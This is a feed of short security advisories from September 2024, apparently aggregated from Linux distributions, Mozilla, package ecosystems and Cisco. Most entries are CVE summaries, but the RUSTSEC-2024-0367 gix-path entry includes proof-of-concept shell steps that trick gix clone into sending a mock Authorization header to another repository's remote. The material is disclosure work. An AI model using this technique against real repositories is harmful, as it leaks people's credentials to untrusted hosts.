03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6163] python3.9 security update (moderate)	[3.9.18-3.5]- Security fix for CVE-2024-8088Resolves: RHEL-55968[3.9.18-3.4]- Security fix for CVE-2024-6923Resolves: RHEL-53044	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6163
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6166] krb5 security update (moderate)	[1.21.1-2.0.1]- Fixed race condition in krb5_set_password() [Orabug: 33609767][1.21.1-2]- CVE-2024-37370 CVE-2024-37371 Fix vulnerabilities in GSS message token handling Resolves: RHEL-45401 RHEL-45390	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6166
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6179] python3.11 security update (moderate)	[3.11.7-1.5]- Security fix for CVE-2024-8088Resolves: RHEL-55960[3.11.7-1.4]- Security fix for CVE-2024-6923Resolves: RHEL-53037	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6179
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6184] orc security update (moderate)	[0.4.31-7]- Add patch for CVE-2024-40897- Resolves: RHEL-50701	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6184
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6186] containernetworking-plugins security update (moderate)	[1:1.4.0-5]- rebuild for CVE-2024-24783- Resolves: RHEL-28431	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6186
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6187] gvisor-tap-vsock security update (moderate)	[6:0.7.3-5]- rebuild for CVE-2024-24783- Resolves: RHEL-28435	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6187
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6188] runc security update (moderate)	[4:1.1.12-4]- rebuild for CVE-2024-24783- Resolves: RHEL-28439	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6188
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6189] buildah security update (moderate)	[1.33.7-4.0.1]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178][2:1.33.7-4]- rebuild for CVE-2024-24783- Resolves: RHEL-28428	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6189
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6192] wget security update (moderate)	[1.21.1-8]- Resolves: RHEL-43226 - Misinterpretation of input may lead to improper behavior	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6192
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6195] skopeo security update (moderate)	[2:1.14.5-1]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/072072b)- Resolves: RHEL-40805	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6195
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6197] ghostscript security update (moderate)	[9.54.0-17]- RHEL-44759 CVE-2024-33870 ghostscript: path traversal to arbitrary files if the current directory is in the permitted paths- RHEL-44745 CVE-2024-33869 ghostscript: path traversal and command execution due to path reduction- RHEL-44731 CVE-2024-29510 ghostscript: format string injection leads to shell command execution (SAFER bypass)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6197
03.09.2024 03:00:00	redhat	[RHSA-2024:6148] nodejs:18 security update (moderate)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6148
03.09.2024 03:00:00	redhat	[RHSA-2024:6147] nodejs:18 security update (moderate)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6147
03.09.2024 03:00:00	redhat	[RHSA-2024:6162] python-urllib3 security update (moderate)	The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6162
03.09.2024 03:00:00	redhat	[RHSA-2024:6163] python3.9 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6163
03.09.2024 03:00:00	redhat	[RHSA-2024:6166] krb5 security update (moderate)	Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* krb5: GSS message token handling (CVE-2024-37371)* krb5: GSS message token handling (CVE-2024-37370)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6166
03.09.2024 03:00:00	redhat	[RHSA-2024:6179] python3.11 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6179
03.09.2024 03:00:00	redhat	[RHSA-2024:6184] orc security update (moderate)	Orc is a library and set of tools for compiling and executing very simple programs that operate on arrays of data. The "language" is a generic assembly language that represents many of the features available in SIMD architectures, including saturated addition and subtraction, and many arithmetic operations.Security Fix(es):* orc: Stack-based buffer overflow vulnerability in ORC (CVE-2024-40897)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6184
03.09.2024 03:00:00	redhat	[RHSA-2024:6187] gvisor-tap-vsock security update (moderate)	A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6187
03.09.2024 03:00:00	redhat	[RHSA-2024:6188] runc security update (moderate)	The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6188
03.09.2024 03:00:00	redhat	[RHSA-2024:6192] wget security update (moderate)	The wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.Security Fix(es):* wget: Misinterpretation of input may lead to improper behavior (CVE-2024-38428)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6192
03.09.2024 03:00:00	redhat	[RHSA-2024:6195] skopeo security update (moderate)	The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6195
03.09.2024 03:00:00	redhat	[RHSA-2024:6242] kpatch-patch-5_14_0-427_13_1 and kpatch-patch-5_14_0-427_31_1 security update (important)	This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel. This patch module is targeted for kernel-5.14.0-427.13.1.el9_4.Security Fix(es):* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6242
03.09.2024 03:00:00	mozilla	[MFSA-2024-40] Security Vulnerabilities fixed in Firefox ESR 128.2 (high)	- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high)A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the <code>with</code> environment.- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate)Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.- CVE-2024-8383: Firefox did not ask before openings news: links in an external application (moderate)Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate)The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.- CVE-2024-8385: WASM type confusion involving ArrayTypes (high)A difference in the handling of StructFields and ArrayTypes in WASM could be used to trigger an exploitable type confusion vulnerability.- CVE-2024-8386: SelectElements could be shown over another site if popups are allowed (low)If a site had been granted the permission to open popup windows, it could cause Select elements to appear on top of another site to perform a spoofing attack.- CVE-2024-8387: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (high)Memory safety bugs present in Firefox 129, Firefox ESR 128.1, and Thunderbird 128.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-40
03.09.2024 03:00:00	mozilla	[MFSA-2024-39] Security Vulnerabilities fixed in Firefox 130 (high)	- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high)A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the <code>with</code> environment.- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate)Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.- CVE-2024-8383: Firefox did not ask before openings news: links in an external application (moderate)Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate)The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.- CVE-2024-8385: WASM type confusion involving ArrayTypes (high)A difference in the handling of StructFields and ArrayTypes in WASM could be used to trigger an exploitable type confusion vulnerability.- CVE-2024-8386: SelectElements could be shown over another site if popups are allowed (low)If a site had been granted the permission to open popup windows, it could cause Select elements to appear on top of another site to perform a spoofing attack.- CVE-2024-8387: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (high)Memory safety bugs present in Firefox 129, Firefox ESR 128.1, and Thunderbird 128.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-8388: Fullscreen notice on Android could be hidden under various panels and OS prompts (moderate)Multiple prompts and panels from both Firefox and the Android OS could be used to obscure the notification announcing the transition to fullscreen mode after the fix for CVE-2023-6870 in Firefox 121. This could lead to spoofing the browser UI if the sudden appearance of the prompt distracted the user from noticing the visual transition happening behind the prompt. These notifications now use the Android Toast feature. This bug only affects Firefox on Android. Other operating systems are unaffected.- CVE-2024-8389: Memory safety bugs fixed in Firefox 130 (high)Memory safety bugs present in Firefox 129. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-39
03.09.2024 03:00:00	mozilla	[MFSA-2024-41] Security Vulnerabilities fixed in Firefox ESR 115.15 (high)	- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high)A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the <code>with</code> environment.- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate)Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.- CVE-2024-8383: Firefox did not ask before openings news: links in an external application (moderate)Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate)The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-41
03.09.2024 03:00:00	oraclelinux	[ELSA-2024-6194] podman security update (important)	[4.9.4-10.0.1]- Fixes issue of podman execvp error while using podmansh [Orabug: 36073625]- Improved saving remote build context to tarfile in Podman daemon [Orabug: 36495655]- Add devices on container startup, not on creation- Backport fast gzip for compression [Orabug: 36420418]- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404][4:4.9.4-10]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/6b45bb1)- Resolves: RHEL-53250[4:4.9.4-9]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/1a2d8e3)- Resolves: RHEL-50507[4:4.9.4-8]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/affa589)- Resolves: RHEL-45916[4:4.9.4-7]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/8fa0c76)- Resolves: RHEL-40804	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6194
03.09.2024 03:00:00	redhat	[RHSA-2024:6146] python3.12 security update (moderate)	Python 3.12 is an accessible, high-level, dynamically typed, interpreted programming language, designed with an emphasis on code readability. It includes an extensive standard library, and has a vast ecosystem of third-party libraries. The python3.12 package provides the "python3.12" executable: the reference interpreter for the Python language, version 3. The majority of its standard library is provided in the python3.12-libs package, which should be installed automatically along with python3.12. The remaining parts of the Python standard library are broken out into the python3.12-tkinter and python3.12-test packages, which may need to be installed separately. Documentation for Python is provided in the python3.12-docs package. Packages containing additional libraries for Python are generally named with the "python3.12-" prefix.Security Fix(es):* cpython: python: email module doesn't properly quotes newlines in email headers, allowing header injection (CVE-2024-6923)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6146
03.09.2024 03:00:00	redhat	[RHSA-2024:6186] containernetworking-plugins security update (moderate)	The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6186
03.09.2024 03:00:00	redhat	[RHSA-2024:6189] buildah security update (moderate)	The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6189
03.09.2024 03:00:00	redhat	[RHSA-2024:6194] podman security update (important)	The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)* gorilla/schema: Potential memory exhaustion attack due to sparse slice deserialization (CVE-2024-37298)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6194
03.09.2024 03:00:00	redhat	[RHSA-2024:6197] ghostscript security update (moderate)	The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: format string injection leads to shell command execution (SAFER bypass) (CVE-2024-29510)* ghostscript: path traversal and command execution due to path reduction (CVE-2024-33869)* ghostscript: path traversal to arbitrary files if the current directory is in the permitted paths (CVE-2024-33870)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6197
04.09.2024 00:03:10	npm	[NPM:GHSA-RW72-V6C7-HF9R] ReDoS in urlregex (moderate)	A vulnerability was found in nescalante urlregex up to 0.5.0 and classified as problematic. This issue affects some unknown processing of the file index.js of the component Backtracking. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.5.1 is able to address this issue. The identifier of the patch is e5a085afe6abfaea1d1a78f54c45af9ef43ca1f9. It is recommended to upgrade the affected component.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RW72-V6C7-HF9R
03.09.2024 03:00:00	freebsd	[FREEBSD:26125E09-69CA-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 4 security fixes: [357391257] High CVE-2024-8362: Use after free in WebAudio. Reported by Cassidy Kim(@cassidy6564) on 2024-08-05 [358485426] High CVE-2024-7970: Out of bounds write in V8. Reported by Cassidy Kim(@cassidy6564) on 2024-08-09	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:26125E09-69CA-11EF-8A0F-A8A1599412C6
03.09.2024 23:17:07	maven	[MAVEN:GHSA-H83P-72JV-G7VP] Missing hostname validation in Kroxylicious (high)	A flaw was found in Kroxylicious. When establishing the connection with the upstream Kafka server using a TLS secured connection, Kroxylicious fails to properly verify the server's hostname, resulting in an insecure connection. For a successful attack to be performed, the attacker needs to perform a Man-in-the-Middle attack or compromise any external systems, such as DNS or network routing configuration. This issue is considered a high complexity attack, with additional high privileges required, as the attack would need access to the Kroxylicious configuration or a peer system. The result of a successful attack impacts both data integrity and confidentiality.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H83P-72JV-G7VP
04.09.2024 01:23:51	rustsec	[RUSTSEC-2024-0367] gix-path uses local config across repos when it is the highest scope	### Summary`gix-path` executes `git` to find the path of a configuration file that belongs to the `git` installation itself, but mistakenly treats the local repository's configuration as system-wide if no higher scoped configuration is found. In rare cases, this causes a less trusted repository to be treated as more trusted, or leaks sensitive information from one repository to another, such as sending credentials to another repository's remote.### DetailsIn `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` and parses the first line of the output to extract the path to the configuration file holding the configuration variable of highest [scope](https://git-scm.com/docs/git-config#SCOPES):<https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L91><https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L112>While the configuration variable of highest scope is not usually in the local scope, there are practical situations where this occurs:- A configuration file truly associated with the installation is not present on all systems and can occasionally be empty. Likewise, there may be no variables in the global scope.- Configuration files associated with those higher scopes may be deliberately skipped by setting the `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` environment variables to `/dev/null` (or to `NUL` on Windows). This prevents `gix-path` from finding the path of configuration files for those scopes, while not preventing downstream components such as the function in `gix-config` from reporting a local path as being associated with the installation.- The `GIT_CONFIG_NOSYSTEM` environment variable can be used to disable configuration associated with the installation. (`GIT_CONFIG_NOSYSTEM=1` is more powerful than `GIT_CONFIG_SYSTEM=/dev/null` on systems where an additional "unknown" scope is associated with the installation, as occurs on macOS with Apple Git.) This will cause the local scope to be the highest nonempty scope under even more situations, though in practice it is less dangerous because most, though possibly not all, downstream components would disregard the value.A user may use either or both of the latter two techniques to turn off an undesired configuration or to create a more replicable environment. Such a user would expect that this results in a more controlled configuration.Often, when located inside one repository, a user performs operations on that repository or that are not specific to any repository. In such use, local configuration is typically desired or at least acceptable, and mistaking it as coming from another scope is not typically harmful.However, sometimes a user is in one repository and operates on another repository. A major case where this occurs is cloning one repository while located in another. This can be done in an ad-hoc fashion, including when cloning the repository outside of the one we are inside. It may also potentially be automated by an application for purposes such as submodule handling. Two kinds of problems are anticipated:- A less secure configuration may be set for a specific repository where it is judged acceptable, even though it would not be wanted for other repositories, such as to enable a protocol or set up debugging.- More likely, a configuration that supplies secrets for use in one repository's remote can be used to send those secrets to another repository's remote.### PoCIn this example, we send mock `Authorization: Basic ...` credentials meant for one repository's remote to another remote, by running `gix` while inside the first repository to clone the second repository.These instructions are written for a Unix shell, but they will work in other shells, including in PowerShell on Windows if the method of setting environment variables is adapted and `/dev/null` is replaced with `NUL`. This procedure is likely to demonstrate the problem on all systems except macOS. This is due to the high-scoped "unknown" configuration that usually accompanies Apple Git, and reflects that gix-path is in practice much less vulnerable on macOS (though still potentially vulnerable).1. Install [`dummyhttp`](https://crates.io/crates/dummyhttp) to serve as a local HTTP server for the demonstration.2. Obtain a build of `gitoxide` with the `max` feature set enabled. While this vulnerability affects other builds, this example requires `max` for `http.extraHeader` support. Running `cargo install gitoxide` will install such a build though it may build against a patched version of `gix-path`. Cloning the repository ([`12251eb`](https://github.com/Byron/gitoxide/commit/12251eb052df30105538fa831e641eea557f13d8) and earlier are affected) and building with `cargo build` or `cargo install --path .` are also sufficient. In contrast, installing from published binaries with `binstall` or `quickinstall` does not provide the `max` feature, as of this writing.3. Run: `dummyhttp -i 127.0.0.1 -c 403 -v`4. In a separate terminal, create a new local repository and set up a mock remote and `http.extraHeader` configuration: ```sh git init myrepo cd myrepo git remote add origin http://127.0.0.1:8080/mygit.git git config --local http.extraHeader 'Authorization: Basic abcde' ```5. Make sure the testing setup is working by running `gix fetch` in the repository and checking that it fails in the expected way. In the terminal where that is run, a message should be shown indicating an HTTP 403 error. The more interesting output is in the terminal where `dummyhttp` is running, which should look like this: ```text 2024-30-30 03:30:16 127.0.0.1:55689 GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1 ┌─Incoming request │ GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1 │ Accept: / │ Authorization: Basic abcde │ Git-Protocol: version=2 │ Host: 127.0.0.1:8080 │ User-Agent: git/oxide-0.42.2 ┌─Outgoing response │ HTTP/1.1 403 Forbidden │ Content-Length: 9 │ Content-Type: text/plain; charset=utf-8 │ Date: Fri, 30 Aug 2024 03:30:16 -0400 ``` Some details may differ, especially dates and times. But `Authorization: Basic abcde` should be shown.6. Now, in the terminal where you ran `gix fetch`, try cloning a separate repository: ```sh gix clone http://127.0.0.1:8080/other.git ``` Check the output appended in the terminal where `dummyhttp` is running. This is to observe that `Authorization: Basic abcde` was rightly not sent. Alternatively, if it does appear, then your system may be in one of the uncommon configurations that is vulnerable without further action.7. Now rerun that command, but with a modified environment, to cause `gix-path` to wrongly treat configuration from the local scope as being associated with the `git` installation: ```sh env GIT_CONFIG_SYSTEM=/dev/null GIT_CONFIG_GLOBAL=/dev/null gix clone http://127.0.0.1:8080/other.git ``` Check the output appended in the terminal where `dummyhttp` is running. Observe that `Authorization: Basic abcde` was wrongly sent.While this procedure uses the same remote host for both repositories, this is not a required element. If the second repository had a different, untrusted host, the extra header would still be sent.### ImpactIt is believed to be very difficult to exploit this vulnerability deliberately, due to the need either to anticipate a situation in which higher-scoped configuration variables would be absent, or to arrange for this to happen. Although any operating system may be affected, users running Apple Git on macOS are much less likely to be affected.In the example shown above, more secure general practices would avoid it: using a credential manager, or even using `http.<url>.extraHeader` with as specific a `<url>` as possible, rather than the more general `http.extraHeader`. Many scenarios are analogous: if each repository's configuration is as secure as possible for how the repository is used, and secrets are stored securely and separately, then the circumstances under which an unacceptably unsecure configuration is used, or under which a leak of credentials would occur, become unlikely.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0367
05.09.2024 02:40:07	slackware	[SSA:2024-248-01] expat	New expat packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/expat-2.6.3-i586-1_slack15.0.txz: Upgraded. This update addresses security issues with impact ranging from denial of service to potentially artitrary code execution. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-45490 https://www.cve.org/CVERecord?id=CVE-2024-45491 https://www.cve.org/CVERecord?id=CVE-2024-45492 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.3-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.3-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.3-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:ddb1a7ead2840c9fa32479c1fc53e359 expat-2.6.3-i586-1_slack15.0.txzSlackware x86_64 15.0 package:59f2208decfd70f127562debc6eafe29 expat-2.6.3-x86_64-1_slack15.0.txzSlackware -current package:b5e98e9d838fde938ff61f5bf38c4428 l/expat-2.6.3-i686-1.txzSlackware x86_64 -current package:e61bc71c8ce229ed30afe158cc2f45b0 l/expat-2.6.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg expat-2.6.3-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-248-01
04.09.2024 23:32:20	maven	[MAVEN:GHSA-G76F-GJFX-4RPR] Vertx gRPC server does not limit the maximum message size (moderate)	In Eclipse Vert.x version 4.3.0 to 4.5.9, the gRPC server does not limit the maximum length of message payload (Maven GAV: io.vertx:vertx-grpc-server and io.vertx:vertx-grpc-client). This is fixed in the 4.5.10 version. Note this does not affect the Vert.x gRPC server based grpc-java and Netty libraries (Maven GAV: io.vertx:vertx-grpc)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G76F-GJFX-4RPR
04.09.2024 19:00:00	cisco	[CISCO-SA-MERAKI-AGENT-DLL-HJ-PTN7PTKE] Cisco Meraki Systems Manager Agent for Windows Privilege Escalation Vulnerability (high)	A vulnerability in Cisco Meraki Systems Manager (SM) Agent for Windows could allow an authenticated, local attacker to execute arbitrary code with elevated privileges.This vulnerability is due to incorrect handling of directory search paths at runtime. A low-privileged attacker could exploit this vulnerability by placing both malicious configuration files and malicious DLL files on an affected system, which would read and execute the files when Cisco Meraki SM launches on startup. A successful exploit could allow the attacker to execute arbitrary code on the affected system with SYSTEM privileges.Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-AGENT-DLL-HJ-PTN7PTKE
